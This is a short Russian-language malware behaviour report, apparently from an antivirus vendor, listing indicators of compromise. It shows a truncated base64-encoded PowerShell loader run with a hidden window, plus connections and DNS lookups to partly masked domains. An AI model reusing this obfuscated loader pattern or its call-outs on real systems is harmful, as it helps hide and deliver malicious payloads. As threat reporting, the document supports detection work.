Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JgAgACgAIAAkAHMAaABFAGwATABJAGQAWwAxAF0AKwAkAHMASABFAGwATABpAGQAWwAxADMAXQArACcAeAAnACkAKAAgAE4AZQB3AC0AbwBiAGoARQBjAFQAIAAgAEkATwAuAGMAbwBtAHAAcgBFAFMAUwBpAE8ATgAuAEQARQBGAEwAYQB0AEUAcwBUAH...
- 'av##omp.ru':80
- 'av##omp.ru':443
- 'is#####arlama.com.tr':80
- 'is#####arlama.com.tr':443
- 'vi####m-life.net':80
- 'ad####uretext.com':80
- 'k9##m.com':80
- 'av##omp.ru':443
- 'is#####arlama.com.tr':443
- DNS ASK av##omp.ru
- DNS ASK is#####arlama.com.tr
- DNS ASK vi####m-life.net
- DNS ASK ad####uretext.com
- DNS ASK k9##m.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JgAgACgAIAAkAHMAaABFAGwATABJAGQAWwAxAF0AKwAkAHMASABFAGwATABpAGQAWwAxADMAXQArACcAeAAnACkAKAAgAE4AZQB3AC0AbwBiAGoARQBjAFQAIAAgAEkATwAuAGMAbwBtAHAAcgBFAFMAUwBpAE8ATgAuAEQARQBGAEwAYQB0AEUAcwBUAH...' (со скрытым окном)